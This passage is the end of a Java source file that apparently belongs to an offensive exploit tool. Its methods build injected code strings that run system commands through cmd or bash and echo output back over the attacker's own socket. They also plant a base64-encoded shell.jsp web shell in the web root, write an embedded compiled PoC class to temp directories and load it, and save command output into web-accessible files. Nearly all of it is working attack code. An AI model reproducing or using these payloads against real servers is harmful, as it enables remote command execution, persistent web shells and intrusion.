403 | String code = " if(java.io.File.separator.equals(\"\\\\\")){\n" +
404 | " java.lang.reflect.Field field = java.io.FileDescriptor.class.getDeclaredField(\"fd\");\n" +
405 | " field.setAccessible(true);\n" +
406 | "\n" +
407 | " Class clazz1 = Class.forName(\"sun.nio.ch.Net\");\n" +
408 | " java.lang.reflect.Method method1 = clazz1.getDeclaredMethod(\"remoteAddress\",new Class[]{java.io.FileDescriptor.class});\n" +
409 | " method1.setAccessible(true);\n" +
410 | "\n" +
411 | " Class clazz2 = Class.forName(\"java.net.SocketOutputStream\", false, null);\n" +
412 | " java.lang.reflect.Constructor constructor2 = clazz2.getDeclaredConstructors()[0];\n" +
413 | " constructor2.setAccessible(true);\n" +
414 | "\n" +
415 | " Class clazz3 = Class.forName(\"java.net.PlainSocketImpl\");\n" +
416 | " java.lang.reflect.Constructor constructor3 = clazz3.getDeclaredConstructor(new Class[]{java.io.FileDescriptor.class});\n" +
417 | " constructor3.setAccessible(true);\n" +
418 | "\n" +
419 | " java.lang.reflect.Method write = clazz2.getDeclaredMethod(\"write\",new Class[]{byte[].class});\n" +
420 | " write.setAccessible(true);\n" +
421 | "\n" +
422 | " java.net.InetSocketAddress remoteAddress = null;\n" +
423 | " java.util.List list = new java.util.ArrayList();\n" +
424 | " java.io.FileDescriptor fileDescriptor = new java.io.FileDescriptor();\n" +
425 | " for(int i = 0; i < 50000; i++){\n" +
426 | " field.set((Object)fileDescriptor, (Object)(new Integer(i)));\n" +
427 | " try{\n" +
428 | " remoteAddress= (java.net.InetSocketAddress) method1.invoke(null, new Object[]{fileDescriptor});\n" +
429 | " if(remoteAddress.toString().startsWith(\"/127.0.0.1\")) continue;\n" +
430 | " if(remoteAddress.toString().startsWith(\"/0:0:0:0:0:0:0:1\")) continue;\n" +
431 | " list.add(new Integer(i));\n" +
432 | "\n" +
433 | " }catch(Exception e){}\n" +
434 | " }\n" +
435 | "\n" +
436 | " for(int i = list.size() - 1; i >= 0; i--){\n" +
437 | " try{\n" +
438 | " field.set((Object)fileDescriptor, list.get(i));\n" +
439 | " Object socketOutputStream = constructor2.newInstance(new Object[]{constructor3.newInstance(new Object[]{fileDescriptor})});\n" +
440 | " String[] cmd = new String[]{\"cmd\",\"/C\", \"" + cmd + "\"};\n" +
441 | " String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter(\"\\\\A\").next().trim();\n" +
442 | " String result = \"HTTP/1.1 200 OK\\nConnection: close\\nContent-Length: \" + (res.length()) + \"\\n\\n\" + res + \"\\n\\n\";\n" +
443 | " write.invoke(socketOutputStream, new Object[]{result.getBytes()});\n" +
444 | " break;\n" +
445 | " }catch (Exception e){\n" +
446 | " //pass\n" +
447 | " }\n" +
448 | " }\n" +
449 | " }";
450 | return code;
451 | }
452 |
453 |
454 | public static String shell(String command){
455 | String content = "";
456 | try{
457 | String fileName = System.getProperty("user.dir") + File.separator + "config" + File.separator + "shell.jsp";
458 | FileReader fileReader = new FileReader(fileName);
459 | BufferedReader bufferedReader = new BufferedReader(fileReader);
460 |
461 | String result = "";
462 | String line = "";
463 | while ( (line = bufferedReader.readLine()) != null){
464 | result += line + "\n";
465 | }
466 |
467 | bufferedReader.close();
468 | fileReader.close();
469 |
470 | BASE64Encoder encoder = new BASE64Encoder();
471 | content = encoder.encode(result.getBytes()).replaceAll("\r|\n|\r\n", "");
472 | } catch (FileNotFoundException e) {
473 | e.printStackTrace();
474 | } catch (IOException e) {
475 | e.printStackTrace();
476 | }
477 |
478 | String path = command.split(":",3)[2];
479 | String code = "String p = Thread.currentThread().getContextClassLoader().getResource(\"\").getPath();\n" +
480 | " p = p.substring(0, p.indexOf(\"WEB-INF\"));\n" +
481 | " p = java.net.URLDecoder.decode(p,\"utf-8\");\n" +
482 | " java.io.PrintWriter w = new java.io.PrintWriter((p + \"" + path + "\"));\n" +
483 | " sun.misc.BASE64Decoder d = new sun.misc.BASE64Decoder();\n" +
484 | " String s = new String(d.decodeBuffer(\"" + content + "\"));\n" +
485 | " w.println(s);\n" +
486 | " w.close();";
487 |
488 | return code;
489 | }
490 |
491 | public static String autoFindRequestEcho(){
492 | String code = " java.net.URL url;\n" +
493 | " if (java.io.File.separator.equals(\"/\")) {\n" +
494 | " url = new java.net.URL(\"file:///tmp/\");\n" +
495 | " }else{\n" +
496 | " url = new java.net.URL(\"file:///c:/windows/temp/\");\n" +
497 | " }\n" +
498 | " java.net.URLClassLoader urlClassLoader = new java.net.URLClassLoader(new java.net.URL[]{url}, Thread.currentThread().getContextClassLoader());\n" +
499 | " urlClassLoader.loadClass(\"PoC\").newInstance();";
500 |
501 | return code;
502 | }
503 |
504 | public static String writeClass(int i){
505 | String content = "yv66vgAAADQAqgcAAgEAA1BvQwcABAEAEGphdmEvbGFuZy9PYmplY3QBAAFoAQATTGphdmEvdXRpbC9IYXNoU2V0OwEACVNpZ25hdHVyZQEAJ0xqYXZhL3V0aWwvSGFzaFNldDxMamF2YS9sYW5nL09iamVjdDs+OwEAAXIBACdMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdDsBAAFwAQAoTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlOwEABjxpbml0PgEAAygpVgEABENvZGUKAAMAEQwADQAOCQABABMMAAkACgkAAQAVDAALAAwHABcBABFqYXZhL3V0aWwvSGFzaFNldAoAFgARCQABABoMAAUABgoAHAAeBwAdAQAQamF2YS9sYW5nL1RocmVhZAwAHwAgAQANY3VycmVudFRocmVhZAEAFCgpTGphdmEvbGFuZy9UaHJlYWQ7CgABACIMACMAJAEAAUYBABYoTGphdmEvbGFuZy9PYmplY3Q7SSlWAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEABUxQb0M7AQABaQEAFShMamF2YS9sYW5nL09iamVjdDspWgoAFgAsDAAtACoBAAhjb250YWlucwoAFgAvDAAwACoBAANhZGQBAANvYmoBABJMamF2YS9sYW5nL09iamVjdDsBAA1TdGFja01hcFRhYmxlCgABADUMACkAKgcANwEAJWphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3QKAAMAOQwAOgA7AQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7CgA9AD8HAD4BAA9qYXZhL2xhbmcvQ2xhc3MMAEAAQQEAEGlzQXNzaWduYWJsZUZyb20BABQoTGphdmEvbGFuZy9DbGFzczspWggAQwEAA2NtZAsANgBFDABGAEcBAAlnZXRIZWFkZXIBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwgASQEAC2dldFJlc3BvbnNlCgA9AEsMAEwATQEACWdldE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsKAE8AUQcAUAEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAwAUgBTAQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7BwBVAQAmamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2ULAFQAVwwAWABZAQAJZ2V0V3JpdGVyAQAXKClMamF2YS9pby9QcmludFdyaXRlcjsHAFsBABFqYXZhL3V0aWwvU2Nhbm5lcgoAXQBfBwBeAQARamF2YS9sYW5nL1J1bnRpbWUMAGAAYQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsKAF0AYwwAZABlAQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwoAZwBpBwBoAQARamF2YS9sYW5nL1Byb2Nlc3MMAGoAawEADmdldElucHV0U3RyZWFtAQAXKClMamF2YS9pby9JbnB1dFN0cmVhbTsKAFoAbQwADQBuAQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWCABwAQACXEEKAFoAcgwAcwB0AQAMdXNlRGVsaW1pdGVyAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS91dGlsL1NjYW5uZXI7CgBaAHYMAHcAeAEABG5leHQBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwoAegB8BwB7AQATamF2YS9pby9QcmludFdyaXRlcgwAfQB+AQAHcHJpbnRsbgEAFShMamF2YS9sYW5nL1N0cmluZzspVgoAegCADACBAA4BAAVmbHVzaAcAgwEAE2phdmEvbGFuZy9FeGNlcHRpb24BAAFvAQAFZGVwdGgBAAFJCgA9AIgMAIkAigEAEWdldERlY2xhcmVkRmllbGRzAQAcKClbTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwoAjACOBwCNAQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQMAI8AkAEADXNldEFjY2Vzc2libGUBAAQoWilWCgCMAJIMAJMAlAEAA2dldAEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7CgA9AJYMAJcAmAEAB2lzQXJyYXkBAAMoKVoKAAEAmgwACwAkBwCcAQATW0xqYXZhL2xhbmcvT2JqZWN0OwoAPQCeDACfADsBAA1nZXRTdXBlcmNsYXNzAQAFc3RhcnQBAAFuAQARTGphdmEvbGFuZy9DbGFzczsBAA1kZWNsYXJlZEZpZWxkAQAZTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEAAXEHAKcBABpbTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEAClNvdXJjZUZpbGUBAAhQb0MuamF2YQAhAAEAAwAAAAMACAAFAAYAAQAHAAAAAgAIAAgACQAKAAAACAALAAwAAAAEAAEADQAOAAEADwAAAFwAAgABAAAAHiq3ABABswASAbMAFLsAFlm3ABizABm4ABsDuAAhsQAAAAIAJQAAABoABgAAAAwABAANAAgADgAMAA8AFgAQAB0AEQAmAAAADAABAAAAHgAnACgAAAAKACkAKgABAA8AAABWAAIAAQAAABoqxgANsgAZKrYAK5kABQSssgAZKrYALlcDrAAAAAMAJQAAAA4AAwAAABQAEAAWABgAFwAmAAAADAABAAAAGgAxADIAAAAzAAAABAACDgEACgALACQAAQAPAAABYAAGAAIAAAC/GxA0owAPsgASxgAKsgAUxgAEsSq4ADSaAKeyABLHAFESNiq2ADi2ADyZAEUqwAA2swASsgASEkK5AEQCAMcACgGzABKnACqyABK2ADgSSAO9AD22AEqyABIDvQADtgBOwABUswAUpwAIVwGzABKyABLGAEayABTGAECyABS5AFYBALsAWlm4AFyyABISQrkARAIAtgBitgBmtwBsEm+2AHG2AHW2AHmyABS5AFYBALYAf6cABFexKhsEYLgAIbEAAgBHAGYAaQCCAHoAsgC1AIIAAwAlAAAASgASAAAAGwASABwAEwAeABoAHwAsACAAMwAhAEAAIgBEACMARwAlAGYAJgBqACcAbgAsAHoALgCnAC8AsgAwALYAMgC3ADUAvgA3ACYAAAAWAAIAAAC/AIQAMgAAAAAAvwCFAIYAAQAzAAAAEwAJEgAzYQcAggT3AEYHAIIAAAYACgAjACQAAQAPAAABpgACAAwAAAB+KrYAOE0stgCHWToGvjYFAzYEpwBbGQYVBDJOLQS2AIsBOgctKrYAkToHGQe2ADi2AJWaAAwZBxu4AJmnAC8ZB8AAm1k6C742CgM2CacAExkLFQkyOggZCBu4AJmECQEVCRUKof/spwAEV4QEARUEFQWh/6QstgCdWU3H/4uxAAEAIwBmAGkAggADACUAAAA+AA8AAAA5AAUAOwAbADwAIAA9ACMAPwAqAEEANQBCADsAQwA+AEQAVgBFAFwARABmAEkAagA7AHQATAB9AE0AJgAAAD4ABgAAAH4AoAAyAAAAAAB+AIUAhgABAAUAeQChAKIAAgAbAE8AowCkAAMAIwBHAIQAMgAHAFYABgClADIACAAzAAAAhgAI/AAFBwA9/wAPAAcHAAMBBwA9AAEBBwCmAAD/ACgACAcAAwEHAD0HAIwBAQcApgcAAwAA/wAQAAwHAAMBBwA9BwCMAQEHAKYHAAMAAQEHAJsAAA//AAkACAcAAwEHAD0HAIwBAQcApgcAAwABBwCC/wAAAAcHAAMBBwA9AAEBBwCmAAACAAEAqAAAAAIAqQ==";
506 |
507 | byte[] bytes = null;
508 | BASE64Decoder decoder = new BASE64Decoder();
509 | try {
510 | bytes = decoder.decodeBuffer(content);
511 | } catch (IOException e) {
512 | //pass
513 | }
514 |
515 | int start = i * 1600;
516 | int end = ((start + 1600) < bytes.length) ? (start + 1600) : bytes.length;
517 | byte[] temp = Arrays.copyOfRange(bytes, start, end);
518 |
519 | BASE64Encoder encoder = new BASE64Encoder();
520 | String part = encoder.encode(temp).replaceAll("\r|\n|\r\n", "");
521 |
522 |
523 |
524 | String code = "String path;\n" +
525 | " if (java.io.File.separator.equals(\"/\")) {\n" +
526 | " path = \"/tmp/PoC.class\";\n" +
527 | " }else{\n" +
528 | " path = \"c:/windows/temp/PoC.class\";\n" +
529 | " }\n" +
530 | " java.io.OutputStream os = new java.io.FileOutputStream(path," + (i != 0) + ");\n" +
531 | " sun.misc.BASE64Decoder d = new sun.misc.BASE64Decoder();\n" +
532 | " java.io.InputStream in = new java.io.ByteArrayInputStream(d.decodeBuffer(\"" + part + "\"));\n" +
533 | " byte[] f = new byte[1024];\n" +
534 | " int l = 0;\n" +
535 | " while((l=in.read(f))!=-1){\n" +
536 | " os.write(f, 0, l);\n" +
537 | " }\n" +
538 | " in.close();\n" +
539 | " os.close();";
540 |
541 | return code;
542 | }
543 |
544 |
545 | public static String wirteFileEcho(String command){
546 | String path = command.split(":",4)[2];
547 | String cmd = command.split(":",4)[3];
548 | cmd = cmd.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\"");
549 |
550 | String code = "String[] c = new String[3];\n" +
551 | " String p = Thread.currentThread().getContextClassLoader().getResource(\"\").getPath();\n" +
552 | " p = p.substring(0, p.indexOf(\"WEB-INF\"));\n" +
553 | " p = java.net.URLDecoder.decode(p,\"utf-8\");\n" +
554 | " if(java.io.File.separator.equals(\"/\")){\n" +
555 | " c[0] = \"/bin/bash\";\n" +
556 | " c[1] = \"-c\";\n" +
557 | " }else{\n" +
558 | " c[0] = \"cmd\";\n" +
559 | " c[1] = \"/C\";\n" +
560 | " }\n" +
561 | " c[2] = \"" + cmd + "\";\n" +
562 | " java.io.InputStream in = Runtime.getRuntime().exec(c).getInputStream();\n" +
563 | " String x = p + \"" + path + "\";\n" +
564 | " java.io.FileOutputStream os = new java.io.FileOutputStream(x);\n" +
565 | " byte[] buffer = new byte[1024];\n" +
566 | " int len = 0;\n" +
567 | " while((len = in.read(buffer)) != -1) {\n" +
568 | " os.write(buffer, 0, len);\n" +
569 | " }\n" +
570 | " in.close();\n" +
571 | " os.close();";
572 |
573 | return code;
574 | }
575 | }
576 |
--------------------------------------------------------------------------------